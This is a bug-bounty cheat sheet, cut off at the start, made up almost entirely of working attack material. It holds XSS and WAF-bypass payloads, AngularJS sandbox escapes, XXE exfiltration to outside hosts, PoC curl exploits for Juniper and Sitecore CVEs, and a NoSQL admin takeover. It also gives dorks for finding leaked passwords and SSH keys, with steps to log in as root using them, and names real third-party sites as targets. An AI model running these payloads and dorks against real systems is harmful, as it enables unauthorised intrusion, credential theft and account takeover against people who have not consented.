<svg><style>@import 'javascript:alert(1)';</style></svg>113. Payload Split Between Multiple <script> Tags
<script>aler</script><script>t(1)</script>114. Inline JavaScript Comment to Break Filters
<script>alert/*hello*/(1)</script>115. JavaScript Constructor from User Input
<script>Function.constructor('alert(1)')()</script>116. Abuse of JavaScript Ternary Operator
<script>1 ? alert(1) : ''</script>117. Exploit CSS Visibility Property for Hidden Script
<div style="visibility:hidden" onclick="alert(1)">Hidden</div>118. Abusing <plaintext> Tag
<plaintext><script>alert(1)</script>
### **60. Multi-Layer Encoded and Obfuscated XSS Payloads**
Leveraging multiple encoding schemes to evade signature-based filters.
**Chrome XSS-Auditor Bypass** by [@vivekchsm](https://twitter.com/vivekchsm)
```html
<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>Chrome < v60 beta XSS-Auditor Bypass
<script src="data:,alert(1)%250A-->
Other Chrome XSS-Auditor Bypasses
<script>alert(1)</script<script>alert(1)%0d%0a-->%09</script<x>%00%00%00%00%00%00%00<script>alert(1)</script>Safari XSS Vector by @mramydnei
<script>location.href;'javascript:alert%281%29'</script>XSS Polyglot by Ahmed Elsobky
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3eKona WAF (Akamai) Bypass
\');confirm(1);//ModSecurity WAF Bypass Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>Wordfence XSS Bypasses
<meter onmouseover="alert(1)"'">><div><meter onmouseover="alert(1)"</div>">><marquee loop=1 width=0 onfinish=alert(1)>Incapsula WAF Bypasses by @i_bo0om
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';><img/src=q onerror='new Function`al\ert\`1\``'>jQuery < 3.0.0 XSS by Egor Homakov
$.get('http://sakurity.com/jqueryxss')In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
Find any cross domain requests to untrusted domains which may inadvertently execute script.
Find any requests to trusted API endpoints where script can be injected into data sources.
URL verification bypasses (works without 	 too)
javas	cript://www.google.com/%0Aalert(1)Markdown XSS
[a](javascript:confirm(1))[a](javascript://www.google.com%0Aprompt(1))[a](javascript://%0d%0aconfirm(1))[a](javascript://%0d%0aconfirm(1);com)[a](javascript:window.onerror=confirm;throw%201)[a]: (javascript:prompt(1))[a]:(�javascript:alert(1)) //Add SOH CharacterFlash SWF XSS
ZeroClipboard:
ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swfplUpload Player:
plupload.flash.swf?%#target%g=alert&uid%g=XSS&plUpload MoxiePlayer:
Moxie.swf?target%g=confirm&uid%g=XSS(also works withMoxie.cdn.swfand other variants)FlashMediaElement:
flashmediaelement.swf?jsinitfunctio%gn=alert`1`videoJS:
video-js.swf?readyFunction=confirmandvideo-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29YUI "io.swf":
io.swf?yid=\"));}catch(e){alert(document.domain);}//YUI "uploader.swf":
uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<Open Flash Chart:
open-flash-chart.swf?get-data=(function(){alert(1)})()AutoDemo:
control.swf?onend=javascript:alert(1)//Adobe FLV Progressive:
/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//and/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//Banner.swf (generic):
banner.swf?clickTAG=javascript:alert(document.domain);//JWPlayer (legacy):
player.swf?playerready=alert(document.domain)and/player.swf?tracecall=alert(document.domain)SWFUpload 2.2.0.1:
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//Uploadify (legacy):
uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swfFlowPlayer 3.2.7:
flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
Note: Useful reference on constructing Flash-based XSS payloads available at MWR Labs.
Lightweight Markup Languages
RubyDoc (.rdoc)
XSS[JavaScript:alert(1)]Textile (.textile)
"Test link":javascript:alert(1)reStructuredText (.rst)
`Test link`__.
__ javascript:alert(document.domain) Unicode characters
†‡•<img src=a onerror=javascript:alert('test')>…‰€AngularJS Template Injection based XSS
For manual verification on a live target, use angular.version in your browser console
1.0.1 - 1.1.5 by Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}1.2.0 - 1.2.1 by Jan Horn (Google)
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}1.2.2 - 1.2.5 by Gareth Heyes (PortSwigger)
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}1.2.6 - 1.2.18 by Jan Horn (Google)
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}1.2.19 - 1.2.23 by Mathias Karlsson
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}1.2.24 - 1.2.29 by Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}1.3.0 by Gábor Molnár (Google)
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}1.3.1 - 1.3.2 by Gareth Heyes (PortSwigger)
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}1.3.3 - 1.3.18 by Gareth Heyes (PortSwigger)
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}1.3.19 by Gareth Heyes (PortSwigger)
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}1.3.20 by Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}1.4.0 - 1.4.9 by Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}1.5.0 - 1.5.8 by Ian Hickey
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}1.5.9 - 1.5.11 by Jan Horn (Google)
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}1.6.0+ (no Expression Sandbox) by Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}Content Security Policy (CSP) bypass via JSONP endpoints
Grab the target's CSP:
curl -I http://example.com | grep 'Content-Security-Policy'Either paste the CSP into https://csp-evaluator.withgoogle.com/ or just submit the target's address into the "Content Security Policy" field. The CSP Evaluator will notify you if one of the whitelisted domains has JSONP endpoints.
Now we can use a Google dork to find some JSONP endpoints on the domains listed above.
site:example.com inurl:callback##XXE LFI Test
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>Blind LFI test (when first case doesn't return anything)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>Access Control bypass (loading restricted resources - PHP example)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>∾</result></foo>SSRF Test
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>XEE (XML Entity Expansion - DOS)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>XEE #2 (Remote attack - through external xml inclusion)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz>XXE FTP HTTP Server
https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
%remote;
%send;
]>
<data>4</data>
File stored on http://publicServer.com/parameterEntity_sendftp.dtd
<!ENTITY % param1 "<!ENTITY % send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;XXE UTF-7
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4To convert between UTF-8 & UTF-7 use recode. recode UTF8..UTF7 payload-file.xml
# Template Injection
Ruby
<%=`id`%>Twig
The following payload should output 49.
{{7*'7'}}Jinja
This payload should output 7777777.
{{7*'7'}}Methods
XSS AUTOMATION SCRIPTS1st method:-
STEP 1 : Subdomain enumeration
---> assetfinder url >> urls.txt
STEP 2 : live host
---> httpx -l urls.txt -o livehosts.txt
STEP 3 : url crawl
---> katana -u livehosts.txt -o endpoints.txt
STEP 4: xss vibes
---> python3 main.py -f endpoints.txt -o vuln.txt -t 10
2nd method :
STEP 1 :
---> waybackurls http://testphp.vulnweb.com | tee param.txt
STEP 2 :
---> cat param.txt | grep = | tee param1.txt
STEP 3 :
---> cat param1.txt | nuclei -t fuzzing-templates
Subdomain Takeover - Github (POC)Recon tools :
knocky - > for subdomain enumeration
Subszy -> to check it is vulnerable to subdomain takeover
Website :
to check dns lookup | |___ https://www.toolsvoid.com/dig-dns-lookup/ (or ) [dig, nslooup ]
Reference Documentation | |___ https://github.com/EdOverflow/can-i-take-over-xyz
Let's Begin hunt<<<
STEP 1 : subdomain enumeration | |___ python knockpy.py -w wordlist/wordlist.txt taget.com --save targets
STEP 2 : after scan completion | |___ check for 404 and alias and save file in guess.txt
STEP 3 : scan using subzy to check vulnerble or not | |___ subzy run --targets guess.txt
STEP 4 : After found it is Vulnerable | |___ Try to takeover the subdomain
SQL AUTOMATION SCRIPTSecho https://cutm.ac.in/ | gau | urldedupe -qs | gf sqli
python3 main.py -u 'https://cutm.ac.in/payu/skill/index.php?id=49' -p payloads/xor.txt -t 5 -o sqli.txt
ghauri -u 'https://cutm.ac.in/payu/skill/index.php?id=49' --dbs --batch
sqlmap -m parameters.txt --batch --level=5 --risk=3 --dbs
SHELL SCRIPTSsniper -t domain.com -m stealth -o -re
RECON PROCESS STAGE 1STEP 1 : subdomain enumeration
You can use subfinder, assetfinder or any subdomain enumeration tools ---> subfinder -d vulnweb.com -o subdomains.txt
STEP 2 : check Live hosts
httpx , httpx-toolkit or any other ---> httpx - l urls.txt -o livehosts.txt
STEP 3 : Use url crawler
waybackurls , katana or any other tools ---> waybackurls http://testphp.vulnweb.com | tee param.txt
STEP 4 : Scanning using Nuclei
nuclei , magicrecon , spyhunt , or any other tools ---> nuclei -l param.txt -severity high,critical,medium -t /home/rohit/.local/nuclei-templates/ -dast
RECON PROCESS STAGE 1STEP 1 : subdomain enumeration
You can use subfinder, assetfinder or any subdomain enumeration tools ---> subfinder -d vulnweb.com -o subdomains.txt
STEP 2 : check Live hosts
httpx , httpx-toolkit or any other ---> httpx - l urls.txt -o livehosts.txt
STEP 3 : Use url crawler
waybackurls , katana or any other tools ---> waybackurls http://testphp.vulnweb.com | tee param.txt
STEP 4 : Scanning using Nuclei
nuclei , magicrecon , spyhunt , or any other tools ---> nuclei -l param.txt -severity high,critical,medium -t /home/rohit/.local/nuclei-templates/ -dast
Now iam going to take one url http://testphp.vulnweb.com
Still scanning is going on , also able to find xss , lfi and other vuln using nuclei
Instant bug bounty Google Dork:
site:.domain.com "join.slack" ext:pdf "invite" site:.domain.com "join.slack" ext:pdf "invite" "internal" site:.domain.com "join.slack" ext:pdf "invite" "confidential" site:.domain.com "join.slack" ext:pdf "invite" "highly confidential"
================================ Google Dork intitle:"Roxy file manager"
RedisDB + LDAP - Network Services Bug Hunting Shodan Dorks
RedisDB Unauth "redis_version"
LDAP Null Bind "LDAP:" -401 -403 -404 -400 -unauthorized -forbidden hostname:"*.domain.com"
Shodan Dorks
FTP port:21 "Login Successful" hostname:"*.domain.com"
VNC "authentication disabled" "RFB 003.008" hostname:"*.domain.com"
================================
Google Dorks inurl:chat site:.edu ext:txt inurl:chat site:.edu.* ext:txt inurl:chat site:.gov ext:txt inurl:chat site:.gov.* ext:txt inurl:chat site:*.domain.com ext:txt
inurl:chat site:.edu ext:log inurl:chat site:.edu.* ext:log inurl:chat site:.gov ext:log inurl:chat site:.gov.* ext:log inurl:chat site:*.domain.com ext:log
================================
SHODAN DORK
http.favicon.hash:2141724739
Exif
Summary:
When a user uploads an image in example.com, the uploaded image’s EXIF Geolocation Data does not gets stripped. As a result, anyone can get sensitive information of example.com users like their Geolocation, their Device information like Device Name, Version, Software & Software version used etc.
Steps to reproduce:
Got to Github ( https://github.com/ianare/exif-samples/tree/master/jpg)
There are lot of images having resolutions (i.e 1280 * 720 ) , and also whith different MB’s .
Go to Upload option on the website
Upload the image
see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect , edit it as html )
open it (http://exif.regex.info/exif.cgi)
See wheather is that still showing exif data , if it is then Report it.
Reports (Hackerone)
POC EXPLOIT
curl -kv "https:///about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' curl -kv "http:///about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
(Try to add the curl flag option --insecure if doesn't work) curl -kv "https:///about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' --insecure curl -kv "http:///about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' --insecure
(if the port is not 80,443 we need to add the port as well in target value http://ip:port/about.php........)
AUTOMATED PUBLIC SCRIPTS
git clone https://github.com/Asbawy/Automation-for-Juniper-cve-2023-36845 ./cve-2023-36845.sh -f ip_list.txt
================================
👉 One Liner cURL Command (PoC) for the Sitecore Remote Code Execution Vulnerability🛡️.
CVE: 2023-35813 (discovered by @mwulftange) CVSS Score: 9.8 Severity: Critical
curl --data '__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl("%3C%25%40Register%0A%20%20%20%20%20%20%20%20TagPrefix%20%3D%20%27x%27%0A%20%20%20%20%20%20%20%20Namespace%20%3D%20%27System.Runtime.Remoting.Services%27%0A%20%20%20%20%20%20%20%20Assembly%20%3D%20%27System.Runtime.Remoting%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089%27%0A%20%20%20%20%25%3E%0A%20%20%20%20%3Cx%3ARemotingService%20runat%3D%27server%27%0A%20%20%20%20%20%20%20%20Context-Response-ContentType%3D%27THIS%20IS%20VULNERABLE%27%0A%20%20%20%20%2F%3E")' /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index -v
Sometimes, also need to include the curl flag option (--insecure) to disable SSL certificate verification.
Steps:
Change the target and run the command in your terminal.
Verify by checking Response Header - Content-Type: THIS IS VULNERABLE
Shodan Dork: http.title:"Sitecore" "200"
http.title:"Sitecore" "200" -401 -400 -404 -502 -forbidden -unauthorized
grep -oP '(?<=).*?(?=)' ips.html > ips cat ips | nuclei -t /home/kali/.local/nuclei-templates/http/cves/2023/CVE-2023-35813.yaml
================================
Google Dork: site:irclog.. site:irclog...edu site:irclog..edu.
Fuzzing endpoints: irclog , irclogs Fuzzing types: file,directory,subdomain(recursive)
================================ Find External Broken Links
blc https://www.example.com -ro -i > broken-links-test.txt
cat broken-links-test.txt | grep "BROKEN"
================================
Google Dorks: "MYSQL_PASSWORD" ext:txt "DB_PASSWORD" ext:txt "PGPASSWORD" ext:txt "MONGODB_PASSWORD" ext:txt
Dork with all possible extensions "MYSQL_PASSWORD" (ext:txt | ext:log | ext:conf | ext:config | ext:sql | ext:db | ext:ini | ext:cfg | ext:yaml) "DB_PASSWORD" (ext:txt | ext:log | ext:conf | ext:config | ext:sql | ext:db | ext:ini | ext:cfg | ext:yaml) "PGPASSWORD" (ext:txt | ext:log | ext:conf | ext:config | ext:sql | ext:db | ext:ini | ext:cfg | ext:yaml) "MONGODB_PASSWORD" (ext:txt | ext:log | ext:conf | ext:config | ext:sql | ext:db | ext:ini | ext:cfg | ext:yaml)
================================ Google Dork: intitle:"index of" "id_rsa" site:.gov intitle:"index of" "id_rsa" site:.gov.* intitle:"index of" "id_rsa" site:.edu intitle:"index of" "id_rsa" site:.edu.* intitle:"index of" "id_rsa" site:*.domain.com intitle:"index of /.ssh" intitle:"index of /" intext:id_rsa
save the file as id_rsa chmod 600 id_rsa ssh -i id_rsa root@serverip
The SSH private key, often found in files like id_rsa, is similar to a digital master key, granting access to sensitive systems and data. If exposed, attackers can exploit this key to impersonate legitimate users, gaining unauthorized entry to servers, databases, or cloud environments. Once inside, they can execute malicious activities such as data theft, tampering, or even complete system compromise.
================================
Step1:First find endpoint to fuzz for hidden parameters
Google Dorks: site:.domain.com ext:php site:.domain.com ext:asp site:.domain.com ext:aspx site:.domain.com ext:jsp site:*.domain.com ext:jspx
site:*.domain.com (ext:php OR ext:asp OR ext:aspx OR ext:jsp OR ext:jspx)
Step2:Run arjun on those endpoints
Tool Link : https://github.com/s0md3v/Arjun
Step3: Test for XSS,SQLi,HTMLi,SSTI,LFI,RFI,etc.. on those new parameters collected
Arjun is a command-line tool specifically designed to look for hidden HTTP parameters. Today’s web applications have lots of parameters to make an application dynamic. Arjun will try to discover those parameters and give you a new set of endpoints to test on.
By default, Arjun makes use of a default wordlist but this can be modified by the user. It is a multi-threaded application, can handle rate limiting, allows input of custom headers, and most importantly, supports GET, POST, XML, and JSON methods.
================================ Google Dork: inurl:/boss/servlet Payload: /boss/app/report/popup.html?/etc/passwd
A vulnerability was found in Boss Mini 1.4.0 Build 6221. It has been classified as critical. This affects an unknown part of the file boss/servlet/document. The manipulation of the argument path leads to file inclusion. It is possible to initiate the attack remotely.
Google Dork: intitle:"index of /.git"
Exposed git directory along with sensitive information (P3/P4) Exposed git directory with no sensitive information (P5)
Git, a popular version control system, is widely used by developers for managing source code. However, misconfigurations or oversight in the Git repository settings can lead to the exposure of sensitive data, including source code, configuration files, and even credentials.
================================
Admin Panel Bypass | privilage escalation with JWT (JSON Web Token) | Bug Bounty
target : https://anytask.com/
WEBSITE : to craft payload
---> https://jwt.onecapture the json token and change the role ROLE_USER to ROLE_ADMIN
Hence we had successfully taken admin panel
subsrcibe to hack with rohit if you like my videos
Strapi Admin Dashboard Takeover Vulnerability
cause :
---> admin dashboard takeover via password reset
target :
---> https://savingthyme.ca/
End-Point :
---> POST /admin/auth/reset-password
ADD header :
---> Content-Type: application/json
Vulnerable Post Data: ---> {"code": {"$gt": 0}, "password": "hacker123", "passwordConfirmation":"hacker123"}
successfully takeover the admin panel
[ # One-Liners for bug bounty
Thanks to all who create these Awesome One Liners❤️
One Line recon using pd tools
subfinder -d redacted.com -all | anew subs.txt; shuffledns -d redacted.com -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt; dnsx -l subs.txt -r resolvers.txt | anew resolved.txt; naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt; httpx -l ports .txt | anew alive.txt; katana -list alive.txt -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -aff | anew urls.txt; nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txtSubdomain Enumeration
## Juicy Subdomains
subfinder -d target.com -silent | dnsx -silent | cut -d ' ' -f1 | grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn'
## from BufferOver.run
curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
## from Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
## from RedHunt Labs Recon API
curl --request GET --url 'https://reconapi.redhuntlabs.com/community/v1/domains/subdomains?domain=<target.com>&page_size=1000' --header 'X-BLOBR-KEY: API_KEY' | jq '.subdomains[]' -r
## from nmap
nmap --script hostmap-crtsh.nse target.com
## from CertSpotter
curl -s "https://api.certspotter.com/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
## from Archive
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
## from JLDC
curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
## from crt.sh
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
## from ThreatMiner
curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u
## from Anubis
curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com"
## from ThreatCrowd
curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com"
## from HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com"
## from AlienVault
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/tesla.com/url_list?limit=100&page=1" | grep -o '"hostname": *"[^"]*' | sed 's/"hostname": "//' | sort -u
## from Censys
censys subdomains target.com
## from subdomain center
curl "https://api.subdomain.center/?domain=target.com" | jq -r '.[]' | sort -uLFI:
cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"Open Redirect:
echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I | grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n" ;donecat subs.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain'SSRF:
cat urls.txt | grep "=" | qsreplace "burpcollaborator_link" >> tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr XSS:
Knoxss mass hunting
file=$1; key="API_KEY"; while read line; do curl https://api.knoxss.pro -d target=$line -H "X-API-KEY: $key" -s | grep PoC; done < $filecat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev "\.(jpeg|jpg|png|ico|gif|css|woff|svg)$" | uro | grep = | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>"cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipeecho target.com | (gau || hakrawler || waybackurls || katana) | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;donecat urls.txt | grep "=" | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.htcat subs.txt | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 http://xsstrike.py -u @ --crawl'Hidden Dirs:
dirsearch -l urls.txt -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-recursive --force-recursive --exclude-sizes=0B --random-agent --full-url -o output.txtffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.jsonffuf json to txt output
cat output.json | jq | grep -o '"url": "http[^"]*"' | grep -o 'http[^"]*' | anew out.txt
Search for Sensitive files from Wayback
echo target.com | (gau || hakrawler || waybackurls || katana) | grep -color -E ".xls | \\. xml | \\.xlsx | \\.json | \\. pdf | \\.sql | \\. doc| \\.docx | \\. pptx| \\.txt| \\.zip| \\.tar.gz| \\.tgz| \\.bak| \\.7z| \\.rar"SQLi:
cat subs.txt | (gau || hakrawler || katana || waybckurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs &&
for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; doneBypass WAF using TOR
sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor --dbs --random-agent --tamper=space2commentfind which host is vuln in output folder of sqlmap/ghauri root@bb:~/.local/share/sqlmap/output#
find -type f -name "log" -exec sh -c 'grep -q "Parameter" "{}" && echo "{}: SQLi"' \;CORS:
echo target.com | (gau || hakrawler || waybackurls || katana) | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;donePrototype Pollution:
subfinder -d target.com -all -silent | httpx -silent -threads 100 | anew alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"JS Files:
Find JS Files:
cat target.txt | (gau || hakrawler || waybackurls || katana) | grep -i -E "\.js" | egrep -v "\.json|\.jsp" | anew js.txtwhile read -r url; do
if curl -s -o /dev/null -w "%{http_code}" "$url" | grep -q 200 && \
curl -s -I "$url" | grep -iq 'Content-Type:.*\(text/javascript\|application/javascript\)'; then
echo "$url"
fi
done < urls.txt > js.txtHidden Params in JS:
cat subs.txt | (gau || hakrawler || waybackurls || katana) | sort -u | httpx -silent -threads 100 | grep -Eiv '(.eot|.jpg|.jpeg|.gif|.css|.tif|.tiff|.png|.ttf|.otf|.woff|.woff2|.ico|.svg|.txt|.pdf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -Eiv '\.js$|([^.]+)\.js|([^.]+)\.js\.[0-9]+$|([^.]+)\.js[0-9]+$|([^.]+)\.js[a-z][A-Z][0-9]+$' | sed 's/.*/&=FUZZ/g'); echo -e "\e[1;33m$url\e[1;32m$vars";doneExtract sensitive end-point in JS:
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -uSSTI:
for url in $(cat targets.txt); do python3 tplmap.py -u $url; print $url; doneScan IPs
